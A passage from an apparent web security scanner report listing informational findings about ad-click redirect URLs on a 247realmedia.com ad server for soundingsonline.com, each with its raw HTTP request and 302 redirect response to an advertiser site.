GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.394. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:54:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.395. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/401425360/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/401425360/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/401425360/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/401425360/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:29:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.396. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.397. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/413179088/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/413179088/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/413179088/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/413179088/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.398. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/415127438/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/415127438/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/415127438/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/415127438/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.399. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/417517818/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/417517818/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/417517818/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/417517818/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.400. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:04:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.401. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/442122875/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/442122875/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/442122875/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/442122875/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.402. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/443045219/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/443045219/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/443045219/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/443045219/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:09:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.403. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:19:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.404. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/455812371/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/455812371/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/455812371/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/455812371/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.405. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.406. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/462425621/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/462425621/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/462425621/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/462425621/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.407. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
